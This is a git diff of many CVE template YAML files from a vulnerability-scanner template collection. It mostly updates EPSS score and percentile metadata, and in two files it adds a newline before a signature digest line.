a/http/cves/2022/CVE-2022-1724.yaml b/http/cves/2022/CVE-2022-1724.yaml index 108bb26235..1f327b914f 100644 --- a/http/cves/2022/CVE-2022-1724.yaml +++ b/http/cves/2022/CVE-2022-1724.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2022-1724 cwe-id: CWE-79 epss-score: 0.00119 - epss-percentile: 0.45838 + epss-percentile: 0.45853 cpe: cpe:2.3:a:simple-membership-plugin:simple_membership:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1756.yaml b/http/cves/2022/CVE-2022-1756.yaml index 458fdb30f7..849058028f 100644 --- a/http/cves/2022/CVE-2022-1756.yaml +++ b/http/cves/2022/CVE-2022-1756.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-1756 cwe-id: CWE-79 epss-score: 0.00099 - epss-percentile: 0.40737 + epss-percentile: 0.40759 cpe: cpe:2.3:a:thenewsletterplugin:newsletter:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1768.yaml b/http/cves/2022/CVE-2022-1768.yaml index c4a3f91b7e..a4daa5a3f4 100644 --- a/http/cves/2022/CVE-2022-1768.yaml +++ b/http/cves/2022/CVE-2022-1768.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-1768 cwe-id: CWE-89 epss-score: 0.60457 - epss-percentile: 0.97413 + epss-percentile: 0.97414 cpe: cpe:2.3:a:carrcommunications:rsvpmaker:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1815.yaml b/http/cves/2022/CVE-2022-1815.yaml index b58900b325..283e3ad2f7 100644 --- a/http/cves/2022/CVE-2022-1815.yaml +++ b/http/cves/2022/CVE-2022-1815.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-1815 cwe-id: CWE-918,CWE-200 epss-score: 0.01154 - epss-percentile: 0.83277 + epss-percentile: 0.83287 cpe: cpe:2.3:a:diagrams:drawio:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1883.yaml b/http/cves/2022/CVE-2022-1883.yaml index f06bc391ce..96b7eae74b 100644 --- a/http/cves/2022/CVE-2022-1883.yaml +++ b/http/cves/2022/CVE-2022-1883.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-1883 cwe-id: CWE-89 epss-score: 0.12349 - epss-percentile: 0.94801 + epss-percentile: 0.94803 cpe: cpe:2.3:a:camptocamp:terraboard:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-1904.yaml b/http/cves/2022/CVE-2022-1904.yaml index 1d427947bb..f4dfa60cb9 100644 --- a/http/cves/2022/CVE-2022-1904.yaml +++ b/http/cves/2022/CVE-2022-1904.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-1904 cwe-id: CWE-79 epss-score: 0.00097 - epss-percentile: 0.40388 + epss-percentile: 0.40409 cpe: cpe:2.3:a:fatcatapps:easy_pricing_tables:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1906.yaml b/http/cves/2022/CVE-2022-1906.yaml index 27617a6cf8..63ccc10bf0 100644 --- a/http/cves/2022/CVE-2022-1906.yaml +++ b/http/cves/2022/CVE-2022-1906.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-1906 cwe-id: CWE-79 epss-score: 0.00097 - epss-percentile: 0.40317 + epss-percentile: 0.40339 cpe: cpe:2.3:a:digiprove:copyright_proof:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1910.yaml b/http/cves/2022/CVE-2022-1910.yaml index 06c25bba19..b86f698a74 100644 --- a/http/cves/2022/CVE-2022-1910.yaml +++ b/http/cves/2022/CVE-2022-1910.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-1910 cwe-id: CWE-79 epss-score: 0.00119 - epss-percentile: 0.45838 + epss-percentile: 0.45853 cpe: cpe:2.3:a:averta:shortcodes_and_extra_features_for_phlox_theme:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1916.yaml b/http/cves/2022/CVE-2022-1916.yaml index 52a1b2fbcc..e14764ae5e 100644 --- a/http/cves/2022/CVE-2022-1916.yaml +++ b/http/cves/2022/CVE-2022-1916.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-1916 cwe-id: CWE-79 epss-score: 0.00097 - epss-percentile: 0.40388 + epss-percentile: 0.40409 cpe: cpe:2.3:a:pluginus:active_products_tables_for_woocommerce:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-1933.yaml b/http/cves/2022/CVE-2022-1933.yaml index 830cba4b9e..1a42bcd11f 100644 --- a/http/cves/2022/CVE-2022-1933.yaml +++ b/http/cves/2022/CVE-2022-1933.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-1933 cwe-id: CWE-79 epss-score: 0.00097 - epss-percentile: 0.40317 + epss-percentile: 0.40339 cpe: cpe:2.3:a:collect_and_deliver_interface_for_woocommerce_project:collect_and_deliver_interface_for_woocommerce:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1937.yaml b/http/cves/2022/CVE-2022-1937.yaml index 74accbfec2..6c146f13b2 100644 --- a/http/cves/2022/CVE-2022-1937.yaml +++ b/http/cves/2022/CVE-2022-1937.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-1937 cwe-id: CWE-79 epss-score: 0.00097 - epss-percentile: 0.40317 + epss-percentile: 0.40339 cpe: cpe:2.3:a:awin:awin_data_feed:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1946.yaml b/http/cves/2022/CVE-2022-1946.yaml index b3bee6cc7a..a096515716 100644 --- a/http/cves/2022/CVE-2022-1946.yaml +++ b/http/cves/2022/CVE-2022-1946.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-1946 cwe-id: CWE-79 epss-score: 0.00097 - epss-percentile: 0.40317 + epss-percentile: 0.40339 cpe: cpe:2.3:a:wpdevart:gallery:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-1952.yaml b/http/cves/2022/CVE-2022-1952.yaml index e5c40ff1f4..fed9be6252 100644 --- a/http/cves/2022/CVE-2022-1952.yaml +++ b/http/cves/2022/CVE-2022-1952.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-1952 cwe-id: CWE-434 epss-score: 0.95415 - epss-percentile: 0.99152 + epss-percentile: 0.99153 cpe: cpe:2.3:a:syntactics:free_booking_plugin_for_hotels\,_restaurant_and_car_rental:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-2034.yaml b/http/cves/2022/CVE-2022-2034.yaml index 3eb9000119..d055e91770 100644 --- a/http/cves/2022/CVE-2022-2034.yaml +++ b/http/cves/2022/CVE-2022-2034.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-2034 cwe-id: CWE-639 epss-score: 0.00576 - epss-percentile: 0.75554 + epss-percentile: 0.75578 cpe: cpe:2.3:a:automattic:sensei_lms:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-21371.yaml b/http/cves/2022/CVE-2022-21371.yaml index e7e7b45d59..27baee212e 100644 --- a/http/cves/2022/CVE-2022-21371.yaml +++ b/http/cves/2022/CVE-2022-21371.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-21371 cwe-id: CWE-22 epss-score: 0.96287 - epss-percentile: 0.99377 + epss-percentile: 0.99378 cpe: cpe:2.3:a:oracle:weblogic_server:12.1.3.0.0:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-21500.yaml b/http/cves/2022/CVE-2022-21500.yaml index 72c4dbdfd5..4ba676464d 100644 --- a/http/cves/2022/CVE-2022-21500.yaml +++ b/http/cves/2022/CVE-2022-21500.yaml @@ -19,7 +19,7 @@ info: cvss-score: 7.5 cve-id: CVE-2022-21500 epss-score: 0.24615 - epss-percentile: 0.961 + epss-percentile: 0.96103 cpe: cpe:2.3:a:oracle:e-business_suite:12.2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-21705.yaml b/http/cves/2022/CVE-2022-21705.yaml index 7caa4b0fe3..9bc0d3cbc7 100644 --- a/http/cves/2022/CVE-2022-21705.yaml +++ b/http/cves/2022/CVE-2022-21705.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-21705 cwe-id: CWE-74,NVD-CWE-Other epss-score: 0.00522 - epss-percentile: 0.74272 + epss-percentile: 0.74301 cpe: cpe:2.3:a:octobercms:october:*:*:*:*:*:*:*:* metadata: max-request: 5 diff --git a/http/cves/2022/CVE-2022-2174.yaml b/http/cves/2022/CVE-2022-2174.yaml index 261e773d55..7f8f40387e 100644 --- a/http/cves/2022/CVE-2022-2174.yaml +++ b/http/cves/2022/CVE-2022-2174.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-2174 cwe-id: CWE-79 epss-score: 0.00113 - epss-percentile: 0.44537 + epss-percentile: 0.44559 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-2185.yaml b/http/cves/2022/CVE-2022-2185.yaml index d95adc0ed4..f8c7189c46 100644 --- a/http/cves/2022/CVE-2022-2185.yaml +++ b/http/cves/2022/CVE-2022-2185.yaml @@ -18,8 +18,8 @@ info: cvss-score: 8.8 cve-id: CVE-2022-2185 cwe-id: CWE-78 - epss-score: 0.47556 - epss-percentile: 0.97083 + epss-score: 0.48376 + epss-percentile: 0.97103 cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-2187.yaml b/http/cves/2022/CVE-2022-2187.yaml index f9711d40bb..8301c92927 100644 --- a/http/cves/2022/CVE-2022-2187.yaml +++ b/http/cves/2022/CVE-2022-2187.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-2187 cwe-id: CWE-79 epss-score: 0.00119 - epss-percentile: 0.45838 + epss-percentile: 0.45853 cpe: cpe:2.3:a:contact_form_7_captcha_project:contact_form_7_captcha:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-2219.yaml b/http/cves/2022/CVE-2022-2219.yaml index 3efeefe22b..bcfbacf258 100644 --- a/http/cves/2022/CVE-2022-2219.yaml +++ b/http/cves/2022/CVE-2022-2219.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2022-2219 cwe-id: CWE-79 epss-score: 0.00179 - epss-percentile: 0.54935 + epss-percentile: 0.54961 cpe: cpe:2.3:a:brizy:unyson:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-22242.yaml b/http/cves/2022/CVE-2022-22242.yaml index 52f01acc5a..c854d3f2d7 100644 --- a/http/cves/2022/CVE-2022-22242.yaml +++ b/http/cves/2022/CVE-2022-22242.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-22242 cwe-id: CWE-79 epss-score: 0.03521 - epss-percentile: 0.90493 + epss-percentile: 0.905 cpe: cpe:2.3:o:juniper:junos:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-22536.yaml b/http/cves/2022/CVE-2022-22536.yaml index a242389e02..62ea98fe46 100644 --- a/http/cves/2022/CVE-2022-22536.yaml +++ b/http/cves/2022/CVE-2022-22536.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-22536 cwe-id: CWE-444 epss-score: 0.95848 - epss-percentile: 0.99255 + epss-percentile: 0.99256 cpe: cpe:2.3:a:sap:content_server:7.53:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-22733.yaml b/http/cves/2022/CVE-2022-22733.yaml index 9273388a6c..2dd689a590 100644 --- a/http/cves/2022/CVE-2022-22733.yaml +++ b/http/cves/2022/CVE-2022-22733.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-22733 cwe-id: CWE-200 epss-score: 0.23758 - epss-percentile: 0.9605 + epss-percentile: 0.96052 cpe: cpe:2.3:a:apache:shardingsphere_elasticjob-ui:3.0.0:-:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-22897.yaml b/http/cves/2022/CVE-2022-22897.yaml index 3f1fd34f62..0c1f9eeb0c 100644 --- a/http/cves/2022/CVE-2022-22897.yaml +++ b/http/cves/2022/CVE-2022-22897.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-22897 cwe-id: CWE-89 epss-score: 0.04685 - epss-percentile: 0.91693 + epss-percentile: 0.91703 cpe: cpe:2.3:a:apollotheme:ap_pagebuilder:*:*:*:*:*:prestashop:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-2290.yaml b/http/cves/2022/CVE-2022-2290.yaml index b0006b75aa..6b366fcf59 100644 --- a/http/cves/2022/CVE-2022-2290.yaml +++ b/http/cves/2022/CVE-2022-2290.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-2290 cwe-id: CWE-79 epss-score: 0.00112 - epss-percentile: 0.44479 + epss-percentile: 0.44501 cpe: cpe:2.3:a:trilium_project:trilium:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-22947.yaml b/http/cves/2022/CVE-2022-22947.yaml index 0921f69340..187e3f4d93 100644 --- a/http/cves/2022/CVE-2022-22947.yaml +++ b/http/cves/2022/CVE-2022-22947.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-22947 cwe-id: CWE-917,CWE-94 epss-score: 0.97481 - epss-percentile: 0.99964 + epss-percentile: 0.99963 cpe: cpe:2.3:a:vmware:spring_cloud_gateway:*:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2022/CVE-2022-22954.yaml b/http/cves/2022/CVE-2022-22954.yaml index 7e0bafdaea..0c1d169a76 100644 --- a/http/cves/2022/CVE-2022-22954.yaml +++ b/http/cves/2022/CVE-2022-22954.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-22954 cwe-id: CWE-94 - epss-score: 0.97369 - epss-percentile: 0.9987 + epss-score: 0.97361 + epss-percentile: 0.99867 cpe: cpe:2.3:a:vmware:identity_manager:3.3.3:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-22963.yaml b/http/cves/2022/CVE-2022-22963.yaml index 1baf1df290..831a9ade8e 100644 --- a/http/cves/2022/CVE-2022-22963.yaml +++ b/http/cves/2022/CVE-2022-22963.yaml @@ -51,4 +51,5 @@ http: - type: status status: - 500 -# digest: 4a0a0047304502205d9b6b9af28f6876568590470e887607524cf9d7bb2f070d4ad831b6268e732a022100e1cfafa2a1146aaeeb9a9d19e233838bed706c6267f5a5449c3172e49db8ed9a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502205d9b6b9af28f6876568590470e887607524cf9d7bb2f070d4ad831b6268e732a022100e1cfafa2a1146aaeeb9a9d19e233838bed706c6267f5a5449c3172e49db8ed9a:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2022/CVE-2022-22965.yaml b/http/cves/2022/CVE-2022-22965.yaml index 7d9592ab4b..a6105d0d27 100644 --- a/http/cves/2022/CVE-2022-22965.yaml +++ b/http/cves/2022/CVE-2022-22965.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-22965 cwe-id: CWE-94 epss-score: 0.97469 - epss-percentile: 0.99956 + epss-percentile: 0.99955 cpe: cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:* metadata: max-request: 4 diff --git a/http/cves/2022/CVE-2022-22972.yaml b/http/cves/2022/CVE-2022-22972.yaml index 1a576b0811..af6b69a026 100644 --- a/http/cves/2022/CVE-2022-22972.yaml +++ b/http/cves/2022/CVE-2022-22972.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-22972 cwe-id: CWE-287 epss-score: 0.73656 - epss-percentile: 0.97766 + epss-percentile: 0.97769 cpe: cpe:2.3:a:vmware:identity_manager:3.3.3:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2022/CVE-2022-23102.yaml b/http/cves/2022/CVE-2022-23102.yaml index b5f2b37f02..310f65f56f 100644 --- a/http/cves/2022/CVE-2022-23102.yaml +++ b/http/cves/2022/CVE-2022-23102.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-23102 cwe-id: CWE-601 epss-score: 0.00366 - epss-percentile: 0.69402 + epss-percentile: 0.69427 cpe: cpe:2.3:a:siemens:sinema_remote_connect_server:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-23131.yaml b/http/cves/2022/CVE-2022-23131.yaml index a0291c12f1..22bb2d847b 100644 --- a/http/cves/2022/CVE-2022-23131.yaml +++ b/http/cves/2022/CVE-2022-23131.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-23131 cwe-id: CWE-290 epss-score: 0.96928 - epss-percentile: 0.99626 + epss-percentile: 0.99627 cpe: cpe:2.3:a:zabbix:zabbix:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-23134.yaml b/http/cves/2022/CVE-2022-23134.yaml index 1aa4e90273..298661ea62 100644 --- a/http/cves/2022/CVE-2022-23134.yaml +++ b/http/cves/2022/CVE-2022-23134.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-23134 cwe-id: CWE-287,CWE-284 epss-score: 0.25751 - epss-percentile: 0.96167 + epss-percentile: 0.9617 cpe: cpe:2.3:a:zabbix:zabbix:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-2314.yaml b/http/cves/2022/CVE-2022-2314.yaml index 6cd1bf51e7..79ebedc34d 100644 --- a/http/cves/2022/CVE-2022-2314.yaml +++ b/http/cves/2022/CVE-2022-2314.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-2314 cwe-id: CWE-78,NVD-CWE-noinfo epss-score: 0.1981 - epss-percentile: 0.95747 + epss-percentile: 0.9575 cpe: cpe:2.3:a:vr_calendar_project:vr_calendar:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-23178.yaml b/http/cves/2022/CVE-2022-23178.yaml index 18e780c3ec..fdf8703857 100644 --- a/http/cves/2022/CVE-2022-23178.yaml +++ b/http/cves/2022/CVE-2022-23178.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-23178 cwe-id: CWE-287 epss-score: 0.03228 - epss-percentile: 0.90135 + epss-percentile: 0.90139 cpe: cpe:2.3:o:crestron:hd-md4x2-4k-e_firmware:1.0.0.2159:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-23347.yaml b/http/cves/2022/CVE-2022-23347.yaml index ea79a0564d..0e984d887e 100644 --- a/http/cves/2022/CVE-2022-23347.yaml +++ b/http/cves/2022/CVE-2022-23347.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-23347 cwe-id: CWE-22 epss-score: 0.15302 - epss-percentile: 0.95246 + epss-percentile: 0.95245 cpe: cpe:2.3:a:bigantsoft:bigant_server:5.6.06:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-23348.yaml b/http/cves/2022/CVE-2022-23348.yaml index be1e653f11..55b54be094 100644 --- a/http/cves/2022/CVE-2022-23348.yaml +++ b/http/cves/2022/CVE-2022-23348.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-23348 cwe-id: CWE-916 epss-score: 0.00425 - epss-percentile: 0.71497 + epss-percentile: 0.71523 cpe: cpe:2.3:a:bigantsoft:bigant_server:5.6.06:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-23544.yaml b/http/cves/2022/CVE-2022-23544.yaml index 72327eff3a..3102fa8fa9 100644 --- a/http/cves/2022/CVE-2022-23544.yaml +++ b/http/cves/2022/CVE-2022-23544.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-23544 cwe-id: CWE-79,CWE-918 epss-score: 0.00059 - epss-percentile: 0.23277 + epss-percentile: 0.23287 cpe: cpe:2.3:a:metersphere:metersphere:*:*:*:*:*:*:*:* metadata: verified: "true" @@ -50,4 +50,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c8f2326b7bd39b80a6a4adc7e8d298705c492aec5dd97234c5983d4c83d79feb022002775c696091d9d71c74faaf2c3ee852b47c33d0f3e1d61f1032aefa50414e41:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100c8f2326b7bd39b80a6a4adc7e8d298705c492aec5dd97234c5983d4c83d79feb022002775c696091d9d71c74faaf2c3ee852b47c33d0f3e1d61f1032aefa50414e41:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2022/CVE-2022-2373.yaml b/http/cves/2022/CVE-2022-2373.yaml index e0263b0f91..2afd2dc550 100644 --- a/http/cves/2022/CVE-2022-2373.yaml +++ b/http/cves/2022/CVE-2022-2373.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-2373 cwe-id: CWE-862 epss-score: 0.00399 - epss-percentile: 0.707 + epss-percentile: 0.70725 cpe: cpe:2.3:a:nsqua:simply_schedule_appointments:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-2376.yaml b/http/cves/2022/CVE-2022-2376.yaml index 0e5e64406f..022675f5c8 100644 --- a/http/cves/2022/CVE-2022-2376.yaml +++ b/http/cves/2022/CVE-2022-2376.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2022-2376 cwe-id: CWE-862 epss-score: 0.04933 - epss-percentile: 0.91909 + epss-percentile: 0.91919 cpe: cpe:2.3:a:wpwax:directorist:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-23779.yaml b/http/cves/2022/CVE-2022-23779.yaml index 6ba6c81333..423bbfac24 100644 --- a/http/cves/2022/CVE-2022-23779.yaml +++ b/http/cves/2022/CVE-2022-23779.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-23779 cwe-id: CWE-200 epss-score: 0.01079 - epss-percentile: 0.82682 + epss-percentile: 0.82694 cpe: cpe:2.3:a:zohocorp:manageengine_desktop_central:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-2379.yaml b/http/cves/2022/CVE-2022-2379.yaml index a797f83052..787ffe934b 100644 --- a/http/cves/2022/CVE-2022-2379.yaml +++ b/http/cves/2022/CVE-2022-2379.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-2379 cwe-id: CWE-862 epss-score: 0.01934 - epss-percentile: 0.87345 + epss-percentile: 0.8735 cpe: cpe:2.3:a:easy_student_results_project:easy_student_results:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-23808.yaml b/http/cves/2022/CVE-2022-23808.yaml index 736cf05804..36db663b82 100644 --- a/http/cves/2022/CVE-2022-23808.yaml +++ b/http/cves/2022/CVE-2022-23808.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-23808 cwe-id: CWE-79 epss-score: 0.00154 - epss-percentile: 0.51634 + epss-percentile: 0.51657 cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-2383.yaml b/http/cves/2022/CVE-2022-2383.yaml index ef57496eb9..c36600d114 100644 --- a/http/cves/2022/CVE-2022-2383.yaml +++ b/http/cves/2022/CVE-2022-2383.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-2383 cwe-id: CWE-79 epss-score: 0.00119 - epss-percentile: 0.45838 + epss-percentile: 0.45853 cpe: cpe:2.3:a:slickremix:feed_them_social:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-23854.yaml b/http/cves/2022/CVE-2022-23854.yaml index 0bcff6d1d3..75d9b8938d 100644 --- a/http/cves/2022/CVE-2022-23854.yaml +++ b/http/cves/2022/CVE-2022-23854.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-23854 cwe-id: CWE-22,CWE-23 epss-score: 0.8684 - epss-percentile: 0.9825 + epss-percentile: 0.98251 cpe: cpe:2.3:a:aveva:intouch_access_anywhere:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-23881.yaml b/http/cves/2022/CVE-2022-23881.yaml index 9706ee452a..e538a3dceb 100644 --- a/http/cves/2022/CVE-2022-23881.yaml +++ b/http/cves/2022/CVE-2022-23881.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-23881 cwe-id: CWE-77 epss-score: 0.18474 - epss-percentile: 0.95636 + epss-percentile: 0.95639 cpe: cpe:2.3:a:zzzcms:zzzphp:2.1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-23898.yaml b/http/cves/2022/CVE-2022-23898.yaml index aba104c87c..f6d7b93580 100644 --- a/http/cves/2022/CVE-2022-23898.yaml +++ b/http/cves/2022/CVE-2022-23898.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-23898 cwe-id: CWE-89 epss-score: 0.02036 - epss-percentile: 0.87712 + epss-percentile: 0.87718 cpe: cpe:2.3:a:mingsoft:mcms:5.2.5:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-23944.yaml b/http/cves/2022/CVE-2022-23944.yaml index 715c91047a..118205d325 100644 --- a/http/cves/2022/CVE-2022-23944.yaml +++ b/http/cves/2022/CVE-2022-23944.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-23944 cwe-id: CWE-306,CWE-862 epss-score: 0.71433 - epss-percentile: 0.97706 + epss-percentile: 0.97708 cpe: cpe:2.3:a:apache:shenyu:2.4.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-24124.yaml b/http/cves/2022/CVE-2022-24124.yaml index dd43f4f4c7..5cd643c517 100644 --- a/http/cves/2022/CVE-2022-24124.yaml +++ b/http/cves/2022/CVE-2022-24124.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-24124 cwe-id: CWE-89 epss-score: 0.01169 - epss-percentile: 0.83417 + epss-percentile: 0.83426 cpe: cpe:2.3:a:casbin:casdoor:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-24129.yaml b/http/cves/2022/CVE-2022-24129.yaml index a619a25af2..a50193025d 100644 --- a/http/cves/2022/CVE-2022-24129.yaml +++ b/http/cves/2022/CVE-2022-24129.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-24129 cwe-id: CWE-918 epss-score: 0.00647 - epss-percentile: 0.7703 + epss-percentile: 0.77051 cpe: cpe:2.3:a:shibboleth:oidc_op:*:*:*:*:*:identity_provider:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-2414.yaml b/http/cves/2022/CVE-2022-2414.yaml index a6f9f96f67..d641003184 100644 --- a/http/cves/2022/CVE-2022-2414.yaml +++ b/http/cves/2022/CVE-2022-2414.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-2414 cwe-id: CWE-611 epss-score: 0.0163 - epss-percentile: 0.86122 + epss-percentile: 0.86126 cpe: cpe:2.3:a:dogtagpki:dogtagpki:10.5.18:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-24181.yaml b/http/cves/2022/CVE-2022-24181.yaml index 06c53dc749..ff0191d66c 100644 --- a/http/cves/2022/CVE-2022-24181.yaml +++ b/http/cves/2022/CVE-2022-24181.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-24181 cwe-id: CWE-79 epss-score: 0.00145 - epss-percentile: 0.50137 + epss-percentile: 0.50159 cpe: cpe:2.3:a:public_knowledge_project:open_journal_systems:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-24223.yaml b/http/cves/2022/CVE-2022-24223.yaml index a334062e5e..8868e8c347 100644 --- a/http/cves/2022/CVE-2022-24223.yaml +++ b/http/cves/2022/CVE-2022-24223.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-24223 cwe-id: CWE-89 epss-score: 0.01499 - epss-percentile: 0.85442 + epss-percentile: 0.85449 cpe: cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-24260.yaml b/http/cves/2022/CVE-2022-24260.yaml index 70cdc16894..70a592dcb8 100644 --- a/http/cves/2022/CVE-2022-24260.yaml +++ b/http/cves/2022/CVE-2022-24260.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-24260 cwe-id: CWE-89 epss-score: 0.42516 - epss-percentile: 0.96922 + epss-percentile: 0.96924 cpe: cpe:2.3:a:voipmonitor:voipmonitor:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-24264.yaml b/http/cves/2022/CVE-2022-24264.yaml index 9f530f3b6b..6ee2333400 100644 --- a/http/cves/2022/CVE-2022-24264.yaml +++ b/http/cves/2022/CVE-2022-24264.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-24264 cwe-id: CWE-89 epss-score: 0.06646 - epss-percentile: 0.93036 + epss-percentile: 0.9304 cpe: 